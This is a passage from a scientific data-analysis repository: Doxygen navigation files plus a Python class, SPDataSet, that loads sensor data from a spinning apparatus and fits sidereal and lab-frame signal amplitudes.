"a933bc9592d21e2b21fbd33317a99e5a043e5336", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 985, "license_type": "no_license", "max_line_length": 82, "num_lines": 15, "path": "/html/getSPdata_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var getSPdata_8py =\n[\n [ \"getSPData\", \"getSPdata_8py.html#abf99dd1de2422300e6e0810c52e352b0\", null ],\n [ \"data\", \"getSPdata_8py.html#afcc30f10d3721c1b098ac36014f598ba\", null ],\n [ \"data2\", \"getSPdata_8py.html#aadc073490775819f8e7b4eecba84d8c0\", null ],\n [ \"fid\", \"getSPdata_8py.html#a0a88573676ca77c114f061278e10a9e5\", null ],\n [ \"mtrig\", \"getSPdata_8py.html#a98628f2f931f1936c89b4f2c90610736\", null ],\n [ \"posfiles\", \"getSPdata_8py.html#ab7bcb6dc1e35e343ea3d5a9f790c1f42\", null ],\n [ \"rotations\", \"getSPdata_8py.html#a3cd7917344307847daed23d1f68575c4\", null ],\n [ \"sdP\", \"getSPdata_8py.html#a1dcdb0bd4cf5fc99ddd642fd2e7dcb7b\", null ],\n [ \"sensfiles\", \"getSPdata_8py.html#ad0b93fd48f5d39d35267e0463a7d2e52\", null ],\n [ \"sensor\", \"getSPdata_8py.html#a5d2dee28b4f96a6448beb4b18e01fb24\", null ],\n [ \"trig\", \"getSPdata_8py.html#af3d30f9077a6d1c700f7f691a8288334\", null ],\n [ \"trigfiles\", \"getSPdata_8py.html#aa7e1cd1161dfd5e09ecfea09630c0395\", null ]\n];" }, { "alpha_fraction": 0.6612903475761414, "alphanum_fraction": 0.774193525314331, "avg_line_length": 61.25, "blob_id": "e972258cb7e2d9cdbc49db072a0ebd2e6bc1083e", "content_id": "a1953e05597e37cf64e4b550f50e9961b98bbab0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 248, "license_type": "no_license", "max_line_length": 174, "num_lines": 4, "path": "/html/namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1LVProcess.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1LVProcess =\n[\n [ \"SPDataSet\", \"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1LVProcess_1_1SPDataSet.html\", \"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1LVProcess_1_1SPDataSet\" ]\n];" }, { "alpha_fraction": 0.6091954112052917, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 20.700000762939453, "blob_id": "05dadfa330fb5c9270ea75ae6aed8654602bc261", "content_id": "124ccd059cbd8c8c0bc5f02cdd70026eb5f8205c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 435, "license_type": "no_license", "max_line_length": 52, "num_lines": 20, "path": "/scrap.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "import loadSPFiles as lspf\nimport SPDataSet as sd\nimport SPfuncs as spf\nimport MT\n\n\n\ndef test():\n ds=sd.SPDataSet('5310.41')\n sAmp1=ds.sequenceAmp(sigWindow=spf.Window(3,-6))\n sAmp2=ds.sequenceAmp(sigWindow=spf.Window(3,-3))\n\n sig1=sAmp1.sig.ravel()\n sig2=sAmp2.sig.ravel()\n err1=sAmp1.err.ravel()\n err2=sAmp2.err.ravel()\n t=sAmp1.t.ravel()\n figure()\n errorbar(t, sig1, err1)\n errorbar(t, sig2, err2)\n\n" }, { "alpha_fraction": 0.6612903475761414, "alphanum_fraction": 0.774193525314331, "avg_line_length": 61.25, "blob_id": "fafb7f5d98e85e755c86eb2daf8c686e57f22572", "content_id": "b9a8536e49b3f3b6bce86af2c5df16591e2be01d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 248, "license_type": "no_license", "max_line_length": 174, "num_lines": 4, "path": "/html/namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet =\n[\n [ \"SPDataSet\", \"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html\", \"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet\" ]\n];" }, { "alpha_fraction": 0.6052631735801697, "alphanum_fraction": 0.7552631497383118, "avg_line_length": 75, "blob_id": "3b486ca94e8c8e990662a6e4c2f02b669bb2eb2b", "content_id": "2b2d63969a64c17a9ca6d99c35686d015f970740", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 380, "license_type": "no_license", "max_line_length": 183, "num_lines": 5, "path": "/html/search/variables_d.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['y2000secs',['y2000secs',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1sdtime.html#ad0dcc84eadafdd803d57e73ef2c6e4a2',1,'repo::programs::pythonpackages::pr::sdtime']]],\n ['ys',['ys',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet.html#af4556d66bac96baab9aed887e66ce083',1,'repo::programs::pythonpackages::pr::SPDataSet']]]\n];\n" }, { "alpha_fraction": 0.5219885110855103, "alphanum_fraction": 0.7361376881599426, "avg_line_length": 64.5, "blob_id": "6855465341919dfd83ec7af0ea6cb9e79a4719de", "content_id": "9a208356878ecf426c8ecf1a8b51cdc1edb9968b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 523, "license_type": "no_license", "max_line_length": 103, "num_lines": 8, "path": "/html/test__SPfuncs_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var test__SPfuncs_8py =\n[\n [ \"fake_data_continuous\", \"test__SPfuncs_8py.html#a590b9f06cd4d860f79e97e27c86548ed\", null ],\n [ \"fake_data_stop_start_2dirs\", \"test__SPfuncs_8py.html#a5b95fcf3c92f76fce1b2bf36daa02403\", null ],\n [ \"fake_data_stop_start_4dirs\", \"test__SPfuncs_8py.html#a5faeabf3b186e4e18ec4ee66a1111342\", null ],\n [ \"test_continuous_fitting\", \"test__SPfuncs_8py.html#af18588089ac02705cb7205aec7430241\", null ],\n [ \"test_cutAmp\", \"test__SPfuncs_8py.html#a287834089412b429481b6b2b90e2d6bf\", null ]\n];" }, { "alpha_fraction": 0.5672060251235962, "alphanum_fraction": 0.5835860371589661, "avg_line_length": 39.46559524536133, "blob_id": "fc247f47460f137018bf384e844d683ce7e19e7d", "content_id": "39580c7635194540801ff9e2db654bbb3dde705f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 35287, "license_type": "no_license", "max_line_length": 203, "num_lines": 872, "path": "/SPDataSet.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "\"\"\"\n\n\"\"\"\nimport pdb\nfrom collections import namedtuple\nfrom functools import partial\nfrom pylab import *\nimport SPfuncs as sp\nfrom MT import nonnan, cached_property, memoize_inst_meth, nearby_angles, combine_angle_pairs, rotate_quadrature_sample, weightedStats, vprint\nimport MT, os\nimport loadSPFiles\nfrom SPfuncs import getAnglesFromRSpec, renameFieldMaybe, getHarmonicsFit, mgStringHarmonics, sliceReduceData, sliceSorted, makeTriggers, Window, RotationSpec, secs2sd, sd2secs, makeTestData, spSearchSet\nfrom SPfuncs import CorrelationData, SiderealFitData, PointData, RawData\nimport SPfuncs as spf\nimport loadSPFiles\nfrom scipy import random\nimport inspect\nimport yaml\nfrom copy import copy\nfrom pprint import pprint\n\n#This works with memoize_inst_methd methods only (and only with Morgan's modified version)\ndef divide_args_memo(kwargs, func_to_follow):\n names_to_keep=list(set(kwargs.keys()) & set(func_to_follow.orig_args[1:]))\n kept_args=dict( [(key, kwargs.pop(key)) for key in names_to_keep] )\n return kwargs, kept_args\n\ndef divide_args(cur_kwargs, work_func):\n \"\"\"Helpful for calling work_func(following_func(**remaining_args), **work_args))\n work_args are the entries of cur_kwargs that are in the argument list of work_func. Remaining_args are those left over\n Currently just returns the divided argument list\n \"\"\"\n names_to_keep=list(set(cur_kwargs.keys()) & set(inspect.getargspec(work_func).args))\n work_args=dict( [(key, cur_kwargs.pop(key)) for key in names_to_keep] )\n #return work_func(following_func(**cur_kwargs), **work_args)\n return cur_kwargs, work_args\n\nttl=300\nclass SPDataSet(object):\n setNameD={\n 'med':'medD',\n 'medium':'medD',\n 'rel':'relD',\n 'relaxed':'relD',\n 'fast':'fastD',\n '':'fastD',\n 'motor':'motorD',\n 'mot':'motorD',\n }\n def __init__(self, timestamp, preloadDict={}, startTime=-inf, endTime=inf, **kwargs):\n self.windowD={}\n self.timestamp=timestamp \n self.startTime=startTime\n self.endTime=endTime\n self.base_dir, self.base_name=loadSPFiles.getSpinningDataNames(timestamp)\n #Add to the class whatever is in preloadDict (these will overide the cached_property functions)\n self.__dict__.update(preloadDict)\n\n\n #Convenience parameter loading from set_info.yaml:\n if kwargs:\n # Just in case you didn't mean to do this, e.g. a typo\n vprint(\"Warning: updating dataset according to kwargs: {0}\".format(kwargs))\n self.__dict__.update(kwargs)\n if self.set_info.has_key('windows'):\n winD=self.set_info['windows']\n \n for winName, winVals in winD.iteritems():\n self.windowD[winName]=Window(**winVals)\n if self.set_info.has_key('badTimes'):\n self.badTimes=self.set_info['badTimes']\n else:\n self.badTimes=[]\n if self.set_info.has_key('skipSeqIs'):\n self.skipSeqIs=self.set_info['skipSeqIs']\n if not hasattr(self.skipSeqIs, '__iter__'):\n self.skipSeqIs=[self.skipSeqIs]\n else:\n self.skipSeqIs=[]\n if self.set_info.has_key('dropTriggerIs'):\n self.dropTriggerIs=self.set_info['dropTriggerIs']\n if not hasattr(self.dropTriggerIs, '__iter__'):\n self.dropTriggerIs=[self.dropTriggerIs]\n else:\n self.dropTriggerIs=[]\n\n if self.set_info.has_key('calOverride'):\n self.calOverride=self.set_info['calOverride']\n else:\n self.calOverride=None\n \n def clearRaw(self):\n for varname in ['fastD', 'medD', 'relD', 'motorD']:\n self._cache.pop(varname, None)\n \n @property\n def rSpec(self):\n return (self.__dict__['rSpec'] if \n self.__dict__.has_key('rSpec') else \n RotationSpec(**self.set_info['rotationSpec'])\n )\n #return RotationSpec(**self.set_info['rotationSpec'])\n @cached_property(ttl=0)\n def set_info(self):\n \"\"\"Property doc string!!\"\"\"\n if self.timestamp=='test':\n return {}\n return loadSPFiles.loadSetInfo(self.base_dir) \n\n def update_set_info(self, newD):\n cur_info=copy(self.set_info)\n new_keys=newD.keys()\n old_keys=cur_info.keys()\n if not all([key in old_keys for key in new_keys]):\n raise ValueError(\"Some keys don't already exist. Edit the info file instead\")\n cur_info.update(newD)\n loadSPFiles.writeSetInfo(self.base_dir, newD)\n\n def tRange(self):\n return [self.fastD[0].min(), self.fastD[0].max()]\n\n #Base level loading\n @staticmethod\n def splitRecArray(rA):\n t=rA['sd']\n names=list(rA.dtype.names)\n names.remove('sd')\n y=rA[names].view(rA.dtype[-1]).reshape(rA.size,-1)\n return [t.copy(), y.T.copy(), names]\n\n @cached_property(ttl=ttl)\n def medD(self):\n rec=loadSPFiles.loadBins('{0}{1} {2}'.format(self.base_dir, self.base_name, 'Medium'), useMetaFile=True) \n if rec is not None:\n renameFieldMaybe(rec, 'Sidereal Days', 'sd')\n dat=self.splitRecArray(rec)\n startI, endI=dat[0].searchsorted([self.startTime, self.endTime])\n dat[0]=dat[0][startI:endI]\n dat[1]=dat[1][:,startI:endI]\n else:\n return None;\n return dat\n\n @cached_property(ttl=ttl)\n def motorPositions(self):\n base_dir,base_name=loadSPFiles.getSpinningDataNames(self.timestamp, bMotorData=True)\n rec=loadSPFiles.loadBins('{0}{1} {2}'.format(base_dir, base_name, 'positions'), useMetaFile=True) \n if rec is not None:\n renameFieldMaybe(rec, 'Sidereal Days', 'sd')\n dat=self.splitRecArray(rec)\n startI, endI=dat[0].searchsorted([self.startTime, self.endTime])\n dat[0]=dat[0][startI:endI]\n dat[1]=dat[1][:,startI:endI]\n else:\n vprint(\"No motor position data\")\n return None;\n return dat\n\n @cached_property(ttl=ttl)\n def motorSensors(self):\n base_dir,base_name=loadSPFiles.getSpinningDataNames(self.timestamp, bMotorData=True)\n rec=loadSPFiles.loadBins('{0}{1} {2}'.format(base_dir, base_name, 'sensors'), useMetaFile=True) \n if rec is not None:\n renameFieldMaybe(rec, 'Sidereal Days', 'sd')\n dat=self.splitRecArray(rec)\n startI, endI=dat[0].searchsorted([self.startTime, self.endTime])\n dat[0]=dat[0][startI:endI]\n dat[1]=dat[1][:,startI:endI]\n else:\n vprint(\"No motor sensor data\")\n return None;\n return dat\n\n @cached_property(ttl=ttl)\n def relD(self):\n rec=loadSPFiles.loadBins('{0}{1} {2}'.format(self.base_dir, self.base_name, 'Relaxed'), useMetaFile=True) \n if rec is not None:\n renameFieldMaybe(rec, 'Sidereal Days', 'sd')\n dat=self.splitRecArray(rec)\n startI, endI=dat[0].searchsorted([self.startTime, self.endTime])\n dat[0]=dat[0][startI:endI]\n dat[1]=dat[1][:,startI:endI]\n else:\n return None;\n return dat\n\n @cached_property(ttl=ttl)\n def fastD(self):\n rec=loadSPFiles.loadBins('{0}{1} {2}'.format(self.base_dir, self.base_name, 'Fast'), totalDataType=[('sd','>f8'), ('s1', '>f4')]) \n if rec is not None:\n dat=self.splitRecArray(rec)\n dat[1]=dat[1].squeeze()\n if self.calOverride is None:\n calArr=self.calArr\n dat[1]=dat[1]*MT.const_interp(dat[0], calArr.t, calArr.val)\n else:\n dat[1]=dat[1]*self.calOverride\n #dat[1]=self.cal*dat[1]\n startI, endI=dat[0].searchsorted([self.startTime, self.endTime])\n dat[0]=dat[0][startI:endI]\n dat[1]=dat[1][startI:endI]\n else:\n return None\n return dat\n\n @cached_property(ttl=ttl)\n def trigTimes(self):\n if self.fastD: #prefer to make triggers with the fast data if it's available\n t=self.rawData().t#fastD[0]\n elif self.medD:\n t=self.medD[0]\n elif self.relD:\n t=self.relD[0]\n else:\n return None\n trigs= makeTriggers(t, self.rSpec, bIncludeExtraRot=True);\n #if self.set_info.has_key('skipFirstTrigger') and self.set_info['skipFirstTrigger']==True:\n # trigs=trigs[:,1:]\n gdTrigMask=ones(self.rSpec.numRotations, dtype=bool) \n gdTrigMask[self.dropTriggerIs]=0\n gdSeqMask=ones(trigs.shape[0], dtype=bool); gdSeqMask[self.skipSeqIs]=0\n trigs=trigs[gdSeqMask]\n trigs=trigs[:,gdTrigMask]\n return trigs\n\n @cached_property(ttl=ttl)\n def apparatusRotations(self):\n gdTrigMask=ones(self.rSpec.numRotations, dtype=bool) \n gdTrigMask[self.dropTriggerIs]=0\n return getRotationsFromRSpec(self.rSpec, self.trigTimes.shape[0])[:,gdTrigMask]/180.*pi\n @cached_property(ttl=0)\n def apparatusAngles(self):\n gdTrigMask=ones(self.rSpec.numRotations, dtype=bool) \n gdTrigMask[self.dropTriggerIs]=0\n return getAnglesFromRSpec(self.rSpec, self.trigTimes.shape[0])[:,gdTrigMask]/180.*pi\n\n @cached_property(ttl=0)\n def zeroingD(self):\n zeroD= loadSPFiles.loadZeroFile('{0}{1} Zeroing List.asc'.format(self.base_dir, self.base_name))\n return zeroD\n \n def cBzCal(self):\n dat=loadtxt('{0}{1} Zeroing z1 Calibrations.asc'.format(self.base_dir, self.base_name)).T\n typ= namedtuple('z1CalData', ['t', 'val'])\n return typ(t= dat[0], val=dat[1])\n \n @property\n def calArr(self, process=None):\n calArr=self.zeroingD['Cal']\n if calArr.t.size>1 and process=='average':\n cal=(diff(calArr.t)*calArr.val[:-1]).sum()/diff(calArr.t).sum() \n #cal=(diff(calArr.t)*calArr.val[:-1]).sum()/diff(calArr.t).sum() # A rough time-average. diff(t)*sum(vals)/sum(diff(t))\n elif process is None:\n if calArr.t.size>1:\n cal=calArr\n elif calArr.t.size==1:\n #cal=calArr.val[0]\n print(\"only one Bx callibration, maybe that's a problem\")\n cal=calArr\n else:\n print(\"no Bx callibration found for timestamp {0}? Using coarse-bz calibration instead\".format(self.timestamp))\n cal = self.cBzCal()\n #vprint(\"Callibration is {0}\".format(cal))\n return cal\n\n def pol(self, t=None):\n polTup=self.zeroingD['Pol']\n tmeas=polTup.t\n if t is None:\n return tmeas, polTup.val\n else:\n pol=interp(t, tmeas, polTup.val)\n return pol\n\n def getSensorData(self, nameL):\n return [getRawByName(name) for name in nameL]\n def getRawByName(self, name):\n ''' Names should be of the form \"med:Total Position Sensor 1\" etc\n '''\n if name=='sig':\n return self.rawData()\n setSt, nameSt=name.split(':')\n data_set=self.__getattribute__(self.setNameD[setSt])\n if data_set is None:\n vprint(\"No data for {0}\".format(name))\n return None\n nameL=data_set[2]\n\n if nameSt not in nameL:\n raise ValueError(\"Requested name '{0}' is not in the list of '{1}' sensors\".format(nameSt, setSt))\n I=nameL.index(nameSt)\n return RawData(t=data_set[0], sig=data_set[1][I])\n \n def rawData(self, rawData=None, **kwargs):\n if isinstance(rawData, RawData):\n rawData=rawData\n elif rawData==None:\n rawData=RawData(self.fastD[0], self.fastD[1])\n elif isinstance(rawData, str): #Load a data set according to the string\n rawData=self.getRawByName(rawData)\n if rawData is None:\n return\n\n goodMask=ones(rawData.t.size, dtype=bool)\n if self.badTimes and not hasattr(self.badTimes[0], '__iter__'):\n self.badTimes=[self.badTimes]\n for interval in self.badTimes: \n if interval[1]==-1:\n interval[1]=inf\n Istart, Istop=rawData.t.searchsorted(interval)\n goodMask[Istart:Istop]=False\n\n rawData= RawData(*[p[goodMask] for p in rawData])\n #.sig[~goodMask]\n self.clearRaw()\n return rawData\n #return RawData(t=rawData.t[goodMask], sig=rawData.sig[goodMask])\n\n #Processing 0\n @memoize_inst_meth\n def cutAmp(self, sigWindow=None, cutSensSubL=[], addFakeD=None, **kwargs):\n if sigWindow==None:\n if not self.windowD.has_key('sig'):\n raise ValueError(\"No signal window was given, and there's no default for this set (check set_info file)\")\n sigWindow=self.windowD['sig'] # if no sigWindow is given, assume there's a default one for this dataset\n elif isinstance(sigWindow, basestring):\n sigWindow=self.windowD[sigWindow]\n vprint(\"Calculating cut amplitudes\")\n cutAmp= spf.preprocess_raw(self.rawData(**kwargs), self.trigTimes, sigWindow)\n if cutSensSubL:\n sensCutAmpL=[self.cutAmp(rawData=name) for name in cutSensSubL]\n if addFakeD is not None:\n cutAmp=spf.addFakeData(cutAmp, self.apparatusAngles, self.trigTimes, **addFakeD)\n return cutAmp\n #return RawData(rawT, rawSig)\n\n @memoize_inst_meth\n def filteredCutAmp(self, sensNameL=None, **kwargs):\n if sensNameL is None:\n if self.set_info.has_key('sensorFilt'):\n sensNameL=self.set_info['sensorFilt']\n else:\n sensNameL=[]\n\n rem_args, work_args=divide_args(kwargs, spf.filterBySensors)\n D=copy(kwargs)\n if D.has_key('rawData'):\n D.pop('rawData')\n if D.has_key('sensNameL'):\n D.pop('sensNameL')\n cutSensorAmps=[self.pointAmp(rawData=name, **D) for name in sensNameL]\n return spf.filterBySensors(self.cutAmp(**rem_args), sensDataL=cutSensorAmps, **work_args)\n \n @memoize_inst_meth\n def seqAmpFitSplit(self, addFakeD=None, **kwargs):\n \"\"\"Assume it's a continuously rotating sample.\n \"\"\"\n rem_args, work_args=divide_args(kwargs, spf.process_continuous_raw)\n rawSig=self.rawData(**rem_args)\n if addFakeD is not None:\n rawSig=spf.addFakeData(rawSig, rotationRate=self.set_info['rotationRate'], **addFakeD)\n\n rawRef=self.rawData('med:Fluxgate Z')\n if self.set_info.has_key('rotationRate'):\n rotationRate=float(self.set_info['rotationRate'])\n else:\n print(\"WARNING:No ration rate in set_info. We'll guess it's -0.03, but if it's not then the answers will be wrong!!\")\n rotationRate=-0.03\n seqAmp=spf.process_continuous_raw(rawSig, rawRef, rotationRate) \n return seqAmp\n\n #Processing 1\n @memoize_inst_meth\n def pointAmp(self, **kwargs):\n vprint(\"Calculating point amplitudes\")\n if self.set_info.has_key('continuousRotation') and self.set_info['continuousRotation']==True:\n Nds=250\n rAmp=self.rawData(**kwargs)\n ptVals, ptErr= MT.downsample_npts(rAmp.sig, Nds, bRetErr=True)\n ptT=MT.downsample_npts(rAmp.t, Nds)\n return PointData(t=ptT, sig=ptVals,err=ptErr/sqrt(Nds), theta=None, chi2=None)\n #return PointData(t=zeros(0), sig=zeros(0),err=zeros(0), theta=zeros(0), chi2=zeros(0))\n rem_args, work_args=divide_args(kwargs, spf.process_raw)\n #pointAmp= spf.process_raw(self.filteredCutAmp(**rem_args), **work_args)\n pointAmp= spf.process_raw(self.cutAmp(**rem_args), **work_args)\n pointAmp=pointAmp._replace(theta=self.apparatusAngles)\n return pointAmp\n\n #Processing 2\n @memoize_inst_meth\n def sequenceAmp(self, bRemoveZerothRotation=True, subtractWindow=None,genSeqFiltF=None, seqSensSubL=[], **kwargs):\n vprint(\"Calculating sequence amplitudes\")\n if self.set_info.has_key('continuousRotation') and self.set_info['continuousRotation']==True:\n seqAmp=self.seqAmpFitSplit(**kwargs)\n else: #stop-start manner\n rem_args, work_args=divide_args(kwargs, spf.process_points)\n pointAmp=self.pointAmp(**rem_args)\n cutAmp=self.filteredCutAmp(**rem_args)\n\n if bRemoveZerothRotation:\n pointAmp=PointData(*[arr.take(r_[1:arr.shape[-1]], axis=-1) if arr is not None else None for arr in pointAmp])\n cutAmp=RawData(*[arr.take(r_[1:arr.shape[-1]], axis=-1) if arr is not None else None for arr in cutAmp])\n\n seqAmp=spf.process_points(self.apparatusAngles, pointAmp, cutAmp, **work_args)\n if subtractWindow:\n vprint('subtracting window \"{}\"'.format(subtractWindow))\n D=copy(rem_args)\n D.update({'sigWindow':subtractWindow})\n refAmp=self.sequenceAmp(**D)\n seqAmp.sig[:]-=refAmp.sig\n\n if seqSensSubL:\n sensSeqAmpL=[self.sequenceAmp(rawData=name) for name in seqSensSubL]\n sensSeqAmpL=[CorrelationData(*[par[:,0,1] for par in sAmp]) for sAmp in sensSeqAmpL]\n sub1HAmp=spf.subtract_correlations(CorrelationData(*[par[:,0,1] for par in seqAmp]), sensSeqAmpL)\n seqAmp.sig[:,0,1]=sub1HAmp.sig\n\n if genSeqFiltF: #General filter on the sequences\n seqAmp=genSeqFiltF(self, seqAmp)\n\n\n return seqAmp\n\n #Processing 3\n @memoize_inst_meth\n def labAmp(self, filtF=None, **kwargs):\n vprint(\"Calculating lab-frame amplitudes\")\n rem_args, work_args=divide_args(kwargs, spf.process_sequences)\n seqAmp=self.sequenceAmp(**rem_args)\n if filtF:\n seqAmp=filtF(seqAmp)\n labAmp, sidAmp= spf.process_sequences(seqAmp)\n return labAmp\n #return spf.split_and_process_sequences(seqAmp, **work_args)\n\n #Processing 3\n @memoize_inst_meth\n def sidAmp(self, filtF=None, coFitL=[], coFitPhaseVaryIs=[], subtractHarmsL=[], harmonic=1, **kwargs):\n h=harmonic-1\n vprint(\"Calculating sidereal amplitudes\")\n rem_args, work_args=divide_args(kwargs, spf.process_sequences_multifit)\n seqAmp=self.sequenceAmp(**rem_args)\n\n #This will be used for the actual processing\n #seqAmp, sensSeqAmpL,\n sensSeqAmpL=[self.sequenceAmp(rawData=name, **rem_args) for name in coFitL]\n\n #Apply the filtering function\n if filtF: #Use some sub-set of the sequences\n seqAmp=filtF(seqAmp)\n if not seqAmp:\n return None\n sensSeqAmpL=zip(*[filtF(sensAmp) for sensAmp in sensSeqAmpL])\n if not sensSeqAmpL:\n sensSeqAmpL=len(seqAmp)*[[]] #Make it a list of empty lists\n\n # Now seqAmp and sensSeqAmpL may be lists (or lists of lists)\n # But if they're not, we'll make sure they are\n if hasattr(seqAmp, 't'):\n seqAmp=[seqAmp]\n if sensSeqAmpL==[]:\n sensSeqAmpL=[sensSeqAmpL]\n \n \n\n if kwargs.has_key('bFitOldWay'):\n work_func=partial(spf.process_sequences)\n labAmp, sidAmp= zip(*[work_func(seqA) for seqA in seqAmp if seqA is not None])\n elif seqAmp:\n work_func=partial(spf.process_sequences_multifit, \n sigSensVaryPhaseIs=coFitPhaseVaryIs, \n subtractHarmsL=subtractHarmsL,harmonic=harmonic, \n **work_args)\n labAmp, sidAmp, _,fObj= zip(*[work_func(seqA, sensAL)[:4] \n for seqA, sensAL in zip(seqAmp, sensSeqAmpL) \n if seqA is not None])\n else:\n print(\"Nothing at timestamp {0}\".format(self.timestamp))\n return None\n if len(sidAmp)==1:\n labAmp=labAmp[0]\n sidAmp=sidAmp[0]\n fObj=fObj[0]\n\n #return labAmp, sidAmp#, fObj\n return sidAmp#, sidAmp\n \n #return spf.split_and_process_sequences(seqAmp, **work_args)\n\n def viewSensors(self, sensorNames, bSharex=False, bPlotStChi2Comp=True, **kwargs):\n if sensorNames=='med':\n sensorNames=['med:'+ name for name in loadSPFiles.mediumNames]\n elif sensorNames=='rel':\n sensorNames=['rel:'+ name for name in loadSPFiles.relaxedNames]\n elif sensorNames=='all':\n sensorNames=['rel:'+ name for name in loadSPFiles.relaxedNames]\n sensorNames.extend(['med:'+ name for name in loadSPFiles.mediumNames])\n self.viewSeq(rawData=sensorNames[0], figName=sensorNames[0], stPtChi2Lim=5, **kwargs)\n ax=gca()\n figL=[gcf()]\n if bSharex==True:\n sharex= ax \n else: \n sharex=None;\n vprint(\"sharex: {}\".format(sharex))\n for name in sensorNames[1:]:\n self.viewSeq(rawData=name, figName=name, sharexAx=sharex, **kwargs)\n figL.append(gcf())\n return figL\n\n def viewRaw(self, figName=\"\", **kwargs):\n if kwargs.has_key('sigWindow'):\n cutAmpL=[self.cutAmp(**kwargs)]\n windowNames=['sig']\n else:\n windowNames, cutAmpL=zip(*[(key, self.cutAmp(sigWindow= win, **kwargs)) for key, win in self.windowD.items()])\n spf.view_raw(self.rawData(**kwargs), cutAmpL, self.trigTimes, cutAmpLNames=windowNames, figName=self.timestamp+'- '+figName) \n\n def viewSeq(self, figName=\"\", sharexAx=None, bPlotStChi2Comp=True, **kwargs):\n if kwargs.has_key('sigWindow'):# and isinstance(kwargs['sigWindow'], basestring):\n figName +='- ({})'.format(kwargs['sigWindow'])\n correlationSigComp=None\n if bPlotStChi2Comp is not None:\n d=copy(kwargs); d['stPtChi2Lim']=inf;\n correlationSigComp=self.sequenceAmp(**d)\n spf.view_correlations(self.pointAmp(**kwargs), self.sequenceAmp(**kwargs), self.timestamp+'- '+figName, sharexAx=sharexAx, correlationSigComp=correlationSigComp.sig)\n\n def viewSid(self, **kwargs):\n #spf.view_sidereal(self.sequenceAmp(**kwargs), self.sidAmp(**kwargs))\n sidAmp=self.sidAmp(**kwargs)\n seqAmp=self.sequenceAmp(**kwargs)\n labAmp=self.labAmp(**kwargs)\n spf.view_sidereal(seqAmp, sidAmp, labAmp)\n\n def viewCorrelationFilt(self, **kwargs):\n D=copy(kwargs)\n D.update(dict(sensNameL=[], stPtChi2Lim=inf))\n pointAmpBase=self.pointAmp(**D)\n seqAmpBase=self.sequenceAmp(**D)\n\n pointAmpFilt=self.pointAmp(**kwargs)\n seqAmpFilt=self.sequenceAmp(**kwargs)\n spf.view_correlation_filtering(pointAmpBase, seqAmpBase,\n pointAmpFilt, seqAmpFilt)\n\n def edit_set_info(self):\n MT.open_file_external(os.path.join(self.base_dir, 'set_info.yaml'))\n @memoize_inst_meth\n def test_div(self, **kwargs):\n kwargs, kept_args=divide_args(kwargs, self.pointAmp)\n return kwargs, kept_args\n\n def checkDirections(self, bPlot=False, **kwargs):\n \"\"\"Check that the calculated apparatus directions fit with the available data\n \n To do this we'll check the North position sensor, the motor trigger-log, and the Z-axis flux-gate, if available\n \"\"\"\n #Flux-gates\n expTh, expSig = [0, pi/2], [ 0.018, -0.045]\n if self.set_info.has_key('bFieldZeroed') and self.set_info['bFieldZeroed'] is False:\n expTh, expSig = [0, pi/2], [ 0.02, -0.08]\n zCor=self.sequenceAmp(rawData='med:Fluxgate Z', **kwargs)\n actSig=zCor.sig[:,0,:]\n actTh=zCor.theta[:,0,:]\n expRot=array([MT.rotate_quadrature_sample(expTh, expSig, cov=None, rotateTo=-th[0])[1] for th in actTh])\n I=~isnan(actSig)\n gSig=actSig[I]\n gExp=expRot[I]\n\n bProblem=False\n if any(abs(gExp-gSig)>0.01):\n vprint(\"Fluxgate Z show's problems! (timestamp: {0})\".format(self.timestamp))\n bProblem=True\n\n if bProblem or bPlot:\n figure(self.timestamp+'- direction check')\n gT=zCor.t[:,0,:][I]\n plot(gT, gSig, '.', label='Measured')\n plot(gT, gExp,'.', label='Expected')\n plot(gT, gExp-gSig,'.', label='difference')\n xlabel('Sid. Days')\n ylabel('V')\n legend(fontsize=10)\n\n\n # North-positon sensor\n try:\n if self.rawData().t[0] < 5200: #(Or whenever the sidereal day the sensor was actually switched?)\n\n npsDat=self.rawData(rawData='med:North Position Sensor') #(or whatever it actually was)\n else:\n npsDat=self.rawData(rawData='motor:North Position Sensor') #(or whatever it actually was)\n except (OSError, ValueError):\n npsDat=None\n\n if npsDat is not None:\n tNorthSens=npsDat.t[npsDat.sig<4]\n\n ang=(self.apparatusAngles()-pi)%(2*pi) + pi #Move everything to the range (-pi, +pi)\n tRot=self.trigTimes()\n tBound=c_[tRot[:-1], tRot[:-1]+self.rSpec.interval].ravel()\n angBound=c_[ang[:-1], ang[1:]].ravel()\n\n apAngleIntp=interp(npsDat.t, tBound, angBound) #Interpolate to the same times as the north-sensor is had\n\n figure('Check North-position sensor:')\n plot(npsDat.t, apAngleIntp)\n plot(npsDat.t, npsDat.sig)\n else:\n vprint(\"No north-position sensor data for checking\")\n \n \n # Motor trigger-log\n\n return\n#------------------------------------------------------------------------------\n\n## Processing 